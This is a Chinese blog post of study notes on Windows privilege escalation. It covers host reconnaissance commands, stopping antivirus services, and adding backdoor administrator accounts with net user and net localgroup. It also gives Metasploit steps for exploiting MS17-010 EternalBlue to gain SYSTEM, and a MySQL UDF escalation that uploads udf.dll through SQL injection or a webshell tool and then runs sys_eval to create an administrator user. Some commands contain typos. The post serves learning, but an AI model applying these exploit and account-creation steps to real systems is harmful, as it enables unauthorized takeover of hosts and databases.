8-提权

作者: Tess鱼丸 | 来源:发表于2023-01-03 00:44 被阅读0次

1.获取IP地址信息
2.获取端口信息
3.获取服务信息和进程信息
4.进程结束,用户管理命令

获取IP地址信息
ipconfig /all

获取端口信息
netstat

netstat -an
活动连接

  协议    本地地址                外部地址        状态
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:14027        0.0.0.0:0              LISTENING
  TCP    127.0.0.1:14027        127.0.0.1:14028        ESTABLISHED
  TCP    127.0.0.1:17945        0.0.0.0:0              LISTENING
  TCP    127.0.0.1:17945        127.0.0.1:11673        ESTABLISHED
  TCP    192.168.1.5:4896       111.13.66.97:80        ESTABLISHED
  TCP    192.168.1.5:5153       120.204.207.144:14000  ESTABLISHED

命令查看系统所开启的所有服务

C:\Users\Tess>net start
已经启动以下 Windows 服务:

   AMD Crash Defender Service
   AMD External Events Utility
   ARMOURY CRATE Service
   ASUS App Service
   ASUS Link Near
   ASUS Optimization
   ASUS Software Manager
   DHCP Client
   Diagnostic System Host
   DNS Client
   Dolby DAX API Service
   Geolocation Service
   Human Interface Device Service
   IP Helper
   IPsec Policy Agent
   System Event Notification Service
   System Events Broker
   System Guard 运行时监视代理
   Windows Defender Firewall
   Windows Management Instrumentation
   Windows Search
   Windows Time
   显示增强服务
   显示策略服务
   更新 Orchestrator 服务
   蓝牙支持服务
   蓝牙音频网关服务
   连接设备平台服务

命令成功完成。
关闭服务,例如杀毒软件等。

net stop 

获取运行的进程名称服务和PID。

C:\Users\Tess>tasklist

映像名称                       PID 会话名              会话#       内存使用
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          8 K
System                           4 Services                   0        156 K
Registry                       172 Services                   0    107,224 K
smss.exe                       620 Services                   0      1,244 K
csrss.exe                     1004 Services                   0      7,224 K
wininit.exe                   1132 Services                   0      7,844 K
csrss.exe                     1140 Console                    1      6,768 K

======================================================================
C:\Users\Tess>tasklist /svc

映像名称                       PID 服务
========================= ======== ============================================
System Idle Process              0 暂缺
System                           4 暂缺
Registry                       172 暂缺
smss.exe                       620 暂缺
csrss.exe                     1004 暂缺
wininit.exe                   1132 暂缺
csrss.exe                     1140 暂缺
services.exe                  1204 暂缺
lsass.exe                     1212 KeyIso, SamSs, VaultSvc
svchost.exe                   1332 BrokerInfrastructure, DcomLaunch, PlugPlay,

3.获取服务信息和进程信息

taskkill
C:\Users\Tess>taskkill /?

TASKKILL [/S system [/U username [/P [password]]]]
         { [/FI filter] [/PID processid | /IM imagename] } [/T] [/F]

描述:
    使用该工具按照进程 ID (PID) 或映像名称终止任务。

参数列表:
    /S    system           指定要连接的远程系统。
    /U    [domain\]user    指定应该在哪个用户上下文执行这个命令。
    /P    [password]       为提供的用户上下文指定密码。如果忽略,提示
                           输入。
    /FI   filter           应用筛选器以选择一组任务。
                           允许使用 "*"。例如,映像名称 eq acme*
    /PID  processid        指定要终止的进程的 PID。
                           使用 TaskList 取得 PID。
    /IM   imagename        指定要终止的进程的映像名称。通配符 '*'可用来
                           指定所有任务或映像名称。
    /T                     终止指定的进程和由它启用的子进程。
    /F                     指定强制终止进程。
    /?                     显示帮助消息。

先tasklist查看正在运行的进程
C:\Users\Tess>taskkill /im notepad++.exe
成功: 给进程 "notepad++.exe" 发送了终止信号,进程的 PID 为 12556。

C:\Users\Tess>
net user username password ladd
net localgroup administrator username /add

C:\Users\Tess>net localgroup administrators yyf /add

1.辅助工具介绍
3.辅助工具命令行介绍
2.辅助工具安装
4.辅助工具使用技巧

Windows-Exploit-Suggester此工具将目标补丁与Microsoft漏洞数据库进行比较,以检测目标上潜在的缺失补丁。

先拿到目标机器的systeminfo
systeminfo > win10.txt

C:\Users\Administrator\Desktop>python2 windows-exploit-suggester.py --audit -i win10.txt -d 2019-02-07-mssb.xls
会扫描出一堆ms17-10的漏洞名称

原理就是去查看systeminfo中的安装补丁,没安装的就报告
修补程序:         安装了 8 个修补程序。
                  [01]: KB5020872
                  [02]: KB5003791
                  [03]: KB5012170

1.远程提权
2.ms17-010介绍
3.扫描探测ms17-010漏洞
4.利用ms17-010漏洞提权

先搜索
msf exploit(windows/smb/ms17_010_eternalblue) > search ms17-010

msf exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set payload exploit/windows/smb/ms17_010_eternalblue

exploit
接下来就可以whoami
\system
system用户是比admin权限还要高的用户,

1.系统提权目的
2.系统提权流程
3.ms11_046提权
4.远程桌面连接

1.udf介绍
2.udf.dII获取
3.上传udf
4.执行提权命令

UDF是mysal的一个拓展接口,UDF (Userdefinedfunction)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段。

在提权过程中,经常使用mysql 的udf.dI进行提权。并且提权之前,要上传udf.dll到指定的目录下。使用seiect @@plugin dir;或 show variables like 'plugin%;查看具体目录。

在拿到数据库的shell后

mysql> select @@plugin_dir;
+-----------------------------------------------------+
| @@plugin_dir                                        |
+-----------------------------------------------------+
| C:\Program Files\MySQL\MySQL Server 8.0\lib\plugin\ |
+-----------------------------------------------------+
1 row in set (0.00 sec)
mysql> show variables like 'plugin%';
+---------------+-----------------------------------------------------+
| Variable_name | Value                                               |
+---------------+-----------------------------------------------------+
| plugin_dir    | C:\Program Files\MySQL\MySQL Server 8.0\lib\plugin\ |
+---------------+-----------------------------------------------------+
1 row in set, 1 warning (0.01 sec)
mysql>

查看系统版本,如何解密两个.dll文件,并放置到对于的目录下
利用sqI注入进行上传 select load_file() into dumpfile“具体路径”
或者使用菜刀直接拖拽到指定目录。

mysql> select @@version_compile_os;
+----------------------+
| @@version_compile_os |
+----------------------+
| Win64                |
+----------------------+
1 row in set (0.00 sec)

mysql>
执行提权命令
create function sys_eval returns string soname 'udf.dll;
select * from mysql.func where name = 'sys_eval';
select sys_eval('dir');
select sys_eval('ipconfig');
select sys_eval('net user user1 123 /add');
select sys_eval('net localgroup administrators user1 /add');
drop function sys_eval;

相关文章

  • 8-提权

    1.获取IP地址信息2.获取端口信息3.获取服务信息和进程信息4.进程结束,用户管理命令 3.获取服务信息和进程信...

  • 17.提权

    提权方法:溢出漏洞提权、数据库提权(mysql提权(udf提权,mof提权,自启动提权)、mssql提权)、第三方...

  • linux 提权-Crontab提权

    前言 记录一下linux提权系列的Crontab计划任务提权的学习过程。 crontab 命令 crontab命令...

  • linux 提权-SUID提权

    前言 最近想着学习linux提权的一些姿势,这里简单分享学习SUID提权的一些知识点。 权限解读 先来父复习一下l...

  • linux 提权-sudo提权

    前言 最近听闻sudo刚刚出来了新漏洞,而最近正好在看linux提权这块知识点。借此梳理一下sudo提权相关的姿势...

  • mysql的提权的四种方案

    mysql的提权原理就是让mysql能够执行系统命令,而对与mysql的提权主要分为两种:MOF提权和UDF提权第...

  • 提权

    目标站点:http://www.xxxx.com 一个新闻发布网站,网站底部备案信息是假的,服务器只能放到国外,这...

  • Windows提权/Linux提权,内网渗透,内网提权

    一个提权靶场,一个关于fire and shadow的世界 这里的提权有:CVE-2019-1388、CVE-20...

  • windows提权

    一、常见提权方法 1、溢出漏洞提权 2、数据库提权 3、第三方软件提权 二、Cmd命令无法执行原因分析 1、Cmd...

  • 【提权】MySQL提权之MOF

    0x01 前言 Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件: ...

网友评论

      本文标题:8-提权

      本文链接:https://www.haomeiwen.com/subject/mukhcdtx.html